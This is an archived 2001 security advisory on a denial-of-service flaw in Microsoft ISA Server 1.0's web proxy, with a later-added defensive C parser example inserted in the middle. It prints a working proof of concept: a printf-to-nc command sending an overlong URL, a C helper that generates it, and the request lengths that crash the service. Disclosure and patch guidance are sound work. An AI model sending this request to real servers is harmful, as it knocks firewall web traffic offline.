ISA.dos.txt

Reported 17 Apr 2001 by securexpert.com (archived at packetstormsecurity.com)

Microsoft ISA Server 1.0 is vulnerable to Denial of Service attacks disrupting web traffic.

FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2]
  
Denial of Service in Microsoft ISA server v1.0  
  
  
Summary  
  
Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a  
simple network-based attack which stops all incoming and outgoing web  
traffic from passing through the firewall until the firewall is rebooted  
or the affected service is restarted.  
  
If the firewall is configured to use the "Web Publishing" feature (inbound  
HTTP proxy to a web server), this attack can be performed remotely.  
  
  
Details  
  
Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is used  
for both the "publishing" of internal web servers to the external network and  
for proxying of internal requests to external web servers.  
  
Sending a URL with a long pathname component to this proxy will cause it to  
terminate with an access violation error.  
  
For example, sending the (valid) HTTP request:  
  
GET http://hostname/aaa[3000 more occurrences of 'a'] HTTP/1.0\n\n
  
to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to  
terminate with an access violation.  
  
This can easily be reproduced from a Linux system by using the following simple
shell command:

```sh
printf "GET http://${HOST}/%s HTTP/1.0\n\n" "$(./repeat ${x} ${y})" | \
nc ${HOST} 80
```

where:
- printf is the shell utility of that name
- ${HOST} is an environment variable set to a hostname which resolves to the
external IP of the ISA server (the format string must be double-quoted so that
the shell expands ${HOST} before printf sees it)
- ./repeat is the simple C program whose source is given below
- ${x} is the ASCII value of the character to insert into the generated URL
- ${y} is the number of repetitions of ${x}
  
The `repeat' program can be compiled from the following simple C source:

```c
/*
 * repeat.c -- quick-n-dirty hack to output argv[2] instances of the
 * character whose ASCII value is given as argv[1]
 *
 * WARNING - this has absolutely no error checking!
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi, atol, exit */

int main(int argc, char **argv)
{
    int character;
    long repetitions, i;

    if (argc != 3) {
        printf("usage: repeat char reps\n");
        exit(1);
    }
    character = atoi(argv[1]);      /* ASCII value of the character to emit */
    repetitions = atol(argv[2]);    /* number of copies to write to stdout */

    for (i = 0L; i < repetitions; i++) {
        printf("%c", character);
    }
    return 0;
}
```
  
The behaviour of W3PROXY.EXE is dependent both on the value of ${x} and the
value of ${y}. With ${x} of 55, the following behaviour is observed based on
the value of ${y}:
  
100: processes correctly, returns "404 Object Not Found" from target web server.  
200: returns 404  
250: returns 404  
254: returns 404  
255: returns "414 URL Too Long"  
260: returns 414  
300: returns 414  
2000: returns 414  
2100: returns 414  
2200: returns 414  
2300: returns 414  
2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and  
is then terminated with an access violation.  
2350: W3PROXY.EXE is terminated on the first attempt.  
All larger values: as 2350, above.  
  
With different values of ${x}, different behaviour is observed for some values
of ${y}. This, along with preliminary analysis of the Dr. Watson logs generated
upon termination of W3PROXY.EXE, initially suggested that an exploitable overflow
may have been present. However, source code analysis by Microsoft has indicated
that only a heap overflow is present, and therefore that this vulnerability is
not exploitable beyond denial of service.
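As an added example (not part of the advisory and not ISA Server's own code), the following C parser shows the defensive pattern the observations above point to: measure the URL inside a bounded window and answer 414 before anything is allocated, so an oversized path never reaches a heap buffer at all. MAX_URL_LEN of 255 is an assumed, illustrative cap on the whole absolute URL (the advisory only reports that 414 first appeared at 255 repetitions of the path character, so the exact thresholds here will not coincide with the table above); parse_request_line and classify_synthetic_request are hypothetical names, and the request that classify_synthetic_request builds is constructed input.

```c
/*
 * Added example, not code from the SecureXpert advisory or from ISA Server:
 * a request-line parser that bounds the URL length *before* any heap
 * allocation, so an oversized URL is answered with 414 instead of being
 * copied into a buffer. MAX_URL_LEN is an assumed illustrative value.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_URL_LEN   ((size_t)255)    /* assumed cap on the absolute URL */
#define MAX_LINE_LEN  ((size_t)8192)   /* hard cap on bytes the parser examines */

/* Outcomes, numbered as the HTTP status a dispatcher would send. */
enum parse_result {
    PARSE_OK           = 200,
    PARSE_BAD_REQUEST  = 400,
    PARSE_URL_TOO_LONG = 414
};

/*
 * Parse "METHOD SP URL SP HTTP/x.y" from the first req_len bytes of req.
 * On PARSE_OK, *url_out receives a NUL-terminated heap copy of the URL
 * (caller frees it). On any other result nothing is allocated: the URL
 * is measured with memchr over a bounded window and never copied.
 */
int parse_request_line(const char *req, size_t req_len, char **url_out)
{
    *url_out = NULL;
    if (req_len > MAX_LINE_LEN)
        req_len = MAX_LINE_LEN;

    /* Method token: must be non-empty and followed by a space. */
    const char *sp = memchr(req, ' ', req_len);
    if (sp == NULL || sp == req)
        return PARSE_BAD_REQUEST;

    const char *url = sp + 1;
    size_t remaining = req_len - (size_t)(url - req);

    /* Look for the URL's terminating space in at most MAX_URL_LEN + 1 bytes.
     * No space in that window means the URL exceeds the cap (414) or the
     * line is truncated (400); either way, nothing is allocated. */
    size_t window = remaining < MAX_URL_LEN + 1 ? remaining : MAX_URL_LEN + 1;
    const char *url_end = memchr(url, ' ', window);
    if (url_end == NULL)
        return remaining > MAX_URL_LEN ? PARSE_URL_TOO_LONG : PARSE_BAD_REQUEST;

    size_t url_len = (size_t)(url_end - url);   /* <= MAX_URL_LEN by construction */
    if (url_len == 0)
        return PARSE_BAD_REQUEST;

    /* Version token: require the "HTTP/" prefix. */
    const char *ver = url_end + 1;
    size_t ver_remaining = req_len - (size_t)(ver - req);
    if (ver_remaining < 5 || memcmp(ver, "HTTP/", 5) != 0)
        return PARSE_BAD_REQUEST;

    /* Only now, with the length known and bounded, copy the URL. */
    char *copy = malloc(url_len + 1);
    if (copy == NULL)
        return PARSE_BAD_REQUEST;
    memcpy(copy, url, url_len);
    copy[url_len] = '\0';
    *url_out = copy;
    return PARSE_OK;
}

/*
 * Build a constructed request of the shape used in the advisory,
 * "GET http://hostname/" followed by n copies of ch, and return the
 * parser's verdict for it.
 */
int classify_synthetic_request(size_t n, int ch)
{
    const char prefix[] = "GET http://hostname/";
    const char suffix[] = " HTTP/1.0\r\n\r\n";
    size_t len = sizeof prefix - 1 + n + sizeof suffix - 1;
    char *req = malloc(len);
    if (req == NULL)
        return PARSE_BAD_REQUEST;
    memcpy(req, prefix, sizeof prefix - 1);
    memset(req + sizeof prefix - 1, ch, n);
    memcpy(req + sizeof prefix - 1 + n, suffix, sizeof suffix - 1);

    char *url = NULL;
    int result = parse_request_line(req, len, &url);
    free(url);
    free(req);
    return result;
}

int main(void)
{
    size_t samples[] = { 100, 200, 2350 };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%zu repetitions -> %d\n", samples[i],
               classify_synthetic_request(samples[i], '7'));
    return 0;
}
```

Compile with `cc -std=c99 -Wall` and run; the verdicts for 100 and 200 repetitions are 200 and for 2350 they are 414. The design point is that the length check uses memchr over a window of MAX_URL_LEN + 1 bytes rather than strlen over the whole request, so the cost of rejecting a request is bounded and no memory is committed for it; a service that instead allocates for the full line and only then compares against a limit is exactly the shape in which repeated oversized requests make the process grow, as the advisory observes for W3PROXY.EXE at 2300 repetitions.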
  
  
Status  
  
Microsoft Corp. was informed of this vulnerability on April 2, 2001.  
A hotfix to address this issue will be released on April 16, 2001,  
synchronized with the release of this advisory.  
  
  
Credits  
  
Richard Reiner, SecureXpert Labs  
Graham Wiseman, SecureXpert Labs  
Matthew Siemens, SecureXpert Labs  
Kent Nicolson, SecureXpert Labs  
  
  
About SecureXpert DIRECT  
  
SecureXpert DIRECT is an advance security advisory service provided to qualified  
subscribers by SecureXpert Labs. Subscriptions are free of charge and may be  
obtained at http://www.securexpert.com/services.html.  
